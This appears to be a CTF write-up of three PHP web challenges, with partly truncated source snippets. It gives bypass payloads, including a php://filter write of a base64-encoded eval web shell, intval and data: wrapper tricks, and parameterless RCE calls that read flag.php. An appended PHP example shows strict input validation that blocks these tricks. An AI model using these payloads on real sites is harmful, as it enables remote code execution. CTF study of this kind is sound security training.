Mssctf WEB writeup
include
Source code
".$c);
}*
}
?>
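- Layer 1 bypass: array overflow bypass, caused by the auto-increment
payload: a=9223372036854775806
- Layer 2 bypass: write a file through the php://filter wrapper. The code at that point contains PHP tags, so they have to be stripped first
payload: b=php://filter/write=string.strip_tags|convert.base64-decode/resource=b.php
- Layer 3: write the content base64-encoded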
c=PD9waHAgZXZhbCgkX0dFVFsxXSk7Pz4=
Hs.com
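Capturing the traffic reveals a hint: Allowed-Request-Method: HS
Requesting the page with the HS method shows the source code.
It reads both $_GET['innerspace'] and $_REQUEST['innerspace'].
The if condition only requires that $data equals mssctf and $data differs from $fake_data.
Change the GET method to HS and send the cookie: innerspace=mssctf
$fake_data is then empty
$data is mssctf
and the flag is returned.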
baby php
Age-old test points
2022) {
$mss4 = file_get_contents($mss2,'r');
if ($mss4 === "mssCTF is interesting!") {
if (!preg_match("/[0-9]|\`|\^|\\$|\*|\%|\~|\+|\{|\}|\'|\\\"|\,|\<|\>|\.|\/|\?/i", $mss3)) {
echo "Regex is so wonderful!";
echo "
";
eval($mss3);
}
else {
echo "Success is near!";
echo "
";
}
}
else {
echo "Do you like PHP?";
echo "
";
}
}
else {
echo "Level1 is a babe trick,try again!";
echo "
";
}
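- intval() bypass using scientific notation
payload: level1=1e10
- file_get_contents() bypass
Bypass it with the data: wrapper
payload: level2=data:,mssCTF%20is%20interesting!
- The third check tests parameterless RCE
payload: first use var_dump(scandir(current(localeconv()))); to see at which position the flag file is listed
then use readfile(next(array_reverse(scandir(current(localeconv()))))); to read flag.php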
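
Added example (not from the original post or the challenge source): one way to close the level1/level2 tricks above and the php://filter write from the include challenge, by parsing integers strictly and refusing any stream-wrapper scheme before a file function is called. The function names, the 0..9999 range, the scratch directory and the file names note.txt and missing.txt are assumptions made for the demo.

```php
<?php
declare(strict_types=1);

// Strict decimal integer inside a fixed range. FILTER_VALIDATE_INT rejects
// exponent forms such as "1e10" outright, and the range keeps any later
// increment far away from PHP_INT_MAX.
function parse_bounded_int(string $raw, int $min, int $max): ?int
{
    $v = filter_var($raw, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => $min, 'max_range' => $max]]);
    return $v === false ? null : $v;
}

// Resolve a user-supplied name to a regular file under $baseDir, or null.
// Anything carrying a scheme (php://filter, data:, ...) is refused before
// a filesystem function ever sees it.
function resolve_local_file(string $name, string $baseDir): ?string
{
    if (preg_match('/^[a-z][a-z0-9+.\-]*:/i', $name) === 1 || str_contains($name, "\0")) {
        return null;
    }
    $base = realpath($baseDir);
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $real === false || !is_file($real)) {
        return null;
    }
    return str_starts_with($real, $base . DIRECTORY_SEPARATOR) ? $real : null;
}

// Constructed demo: a scratch directory holding one harmless file.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'wp_demo_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'note.txt', 'mssCTF is interesting!');

// Inputs: the payload values shown on this page plus constructed benign ones.
foreach (['1e10', '9223372036854775806', '2021'] as $n) {
    printf("int  %-22s => %s\n", $n, var_export(parse_bounded_int($n, 0, 9999), true));
}
$names = ['data:,mssCTF%20is%20interesting!',
    'php://filter/write=string.strip_tags|convert.base64-decode/resource=b.php',
    'missing.txt', 'note.txt'];
foreach ($names as $f) {
    printf("file %-22.22s => %s\n", $f, var_export(resolve_local_file($f, $dir), true));
}

unlink($dir . DIRECTORY_SEPARATOR . 'note.txt');
rmdir($dir);
```

Only 2021 and note.txt are accepted; the exponent string, the out-of-range integer, both wrapper URLs and the nonexistent file all come back as NULL.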
Original post: https://www.cnblogs.com/Flowers-Bei-Cheng/p/15004825.html